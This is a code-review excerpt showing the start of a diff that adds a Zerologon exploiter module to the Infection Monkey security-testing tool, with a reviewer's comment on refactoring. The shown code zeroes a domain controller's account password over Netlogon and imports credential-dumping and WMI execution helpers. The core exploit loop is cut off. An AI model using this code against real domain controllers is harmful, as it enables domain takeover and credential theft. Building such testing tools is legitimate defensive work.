monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,581 @@
+
+import impacket
+import nmb.NetBIOS
+from impacket.dcerpc.v5 import epm, nrpc, transport
+from impacket.dcerpc.v5.dtypes import NULL
+
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit.HostExploiter import HostExploiter
+from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
+from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
+from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
+from infection_monkey.utils.capture_output import StdoutCapture
+
+
+LOG = logging.getLogger(__name__)
+
+
+class ZerologonExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ["windows"]
+    _EXPLOITED_SERVICE = "Netlogon"
+    EXPLOIT_TYPE = ExploitType.VULNERABILITY
+    RUNS_AGENT_ON_SUCCESS = False
+    MAX_ATTEMPTS = 2000
+    ERROR_CODE_ACCESS_DENIED = 0xC0000022
+
+    def __init__(self, host: object):
+        super().__init__(host)
+        self.vulnerable_port = None
+        self.exploit_info["credentials"] = {}
+        self._extracted_creds = {}
+
+    def _exploit_host(self) -> bool:
+        self.dc_ip, self.dc_name, self.dc_handle = ZerologonExploiter.get_dc_details(
+            self.host
+        )
+
+        is_exploitable, rpc_con = self.is_exploitable()
+        if is_exploitable:
+            LOG.info("Target vulnerable, changing account password to empty string.")
+
+            # Start exploiting attempts.
+            LOG.debug("Attempting exploit.")
+            _exploited = self._send_exploit_rpc_login_requests(rpc_con)
+
+            rpc_con.disconnect()
+
+        else:
+            LOG.info(
+                "Exploit not attempted. Target is most likely patched, or an error was encountered."
+            )
+            return False
+
+        # Restore DC's original password.
+        if _exploited:
+            if self.restore_password():
+                self.store_extracted_creds_for_exploitation()
+                LOG.info("System exploited and password restored successfully.")
+            else:
+                LOG.info("System exploited but couldn't restore password!")
+        else:
+            LOG.info("System was not exploited.")
+
+        return _exploited
+
+    @staticmethod
+    def get_dc_details(host: object) -> (str, str, str):
+        dc_ip = host.ip_addr
+        dc_name = ZerologonExploiter.get_dc_name(dc_ip=dc_ip)
+        dc_handle = "\\\\" + dc_name
+        return dc_ip, dc_name, dc_handle
+
+    @staticmethod
+    def get_dc_name(dc_ip: str) -> str:
+        """
+        Gets NetBIOS name of the Domain Controller (DC).
+        """
+        try:
+            nb = nmb.NetBIOS.NetBIOS()
+            name = nb.queryIPForName(
+                ip=dc_ip
+            )  # returns either a list of NetBIOS names or None
+            return name[0] if name else ""
+        except BaseException as ex:
+            LOG.info(f"Exception: {ex}")
+
+    def is_exploitable(self) -> (bool, object):
```

Comment:
Vulnerability assessment functionality should be moved to `zerologon_utils/vuln_assessment.py` . This class is already 600 lines long